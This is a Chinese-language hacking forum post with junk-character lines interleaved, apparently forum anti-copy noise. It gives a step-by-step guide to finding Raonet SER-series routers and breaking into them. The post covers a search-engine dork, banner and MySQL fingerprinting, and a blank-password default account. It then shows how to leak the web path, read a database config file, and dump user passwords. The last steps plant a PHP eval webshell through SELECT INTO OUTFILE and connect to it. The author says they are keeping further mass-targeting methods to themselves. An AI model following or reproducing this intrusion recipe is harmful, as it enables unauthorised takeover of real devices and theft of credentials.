寻找存在漏洞的路由器方法:
% J; n& H) c# G5 s" c3 u. ~/ @' W1 q% y0 i5 ^
1:google搜索'Raonet Subscriber Ethernet Router'
% f; s+ e6 H. U9 O6 X/ X# l4 \8 P0 J, x. C
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# r: s: K) x" W ?: X. n. p
- C9 Y+ H! Z. K1 j3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
! F# b+ R1 a: H ~4 A& F6 Z! m
! c5 S- B- s. s1 _' v# L! M2 m//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
! l7 {# m' i9 c
+ X; q: j/ d) p ?, r) o( x0 @
- S' p6 t, A4 [# |) A
入侵步骤:$ m) A/ a1 c8 l: V$ V2 J+ z; d
9 E- h; K) X. W* r: V3 K. o. a1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
3 z; e! N5 _$ l+ g# {. t0 Q7 J. D' A4 L* i( ~ R+ M; r& n
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
0 a/ z' p( v" Z9 w& ? b8 K9 p3:得到密码后连接,查看GUI管理密码:1 l; A7 I1 `3 B$ v
use ser_500
4 c4 j, J6 b% _5 t0 W0 aselect id,passwd from user;
: s# Z* ?' v$ i' |+ r6 P4:通过数据库写入webshell,执行命令:
7 U/ z# k6 j8 ^. m6 k _" Duse mysql;
! W. h; A6 U' z1 E8 V6 screate table ok(cmd TEXT);
8 Q. \4 ^* b/ t+ a* C3 Y6 U* k& Oinsert into ok values("<?php @eval($_POST[cmd])?>");
! X" T, u! u: g' `& V# dselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
% a# e) R3 k! H0 q7 Ydrop table ok;
; I$ h. F0 P+ Q1 e, i! j1 \0 E j8 n6 t! \: M5 B! j
5:连接后门shell.php
5 y O) f% Y V4 k* b" N$ V- ?0 P0 `4 Z7 q4 H
6. 搞定!
3 u7 f) P. L. E1 H# H7 I* X; O
# P. o8 C& `! h4 F: K- R& t |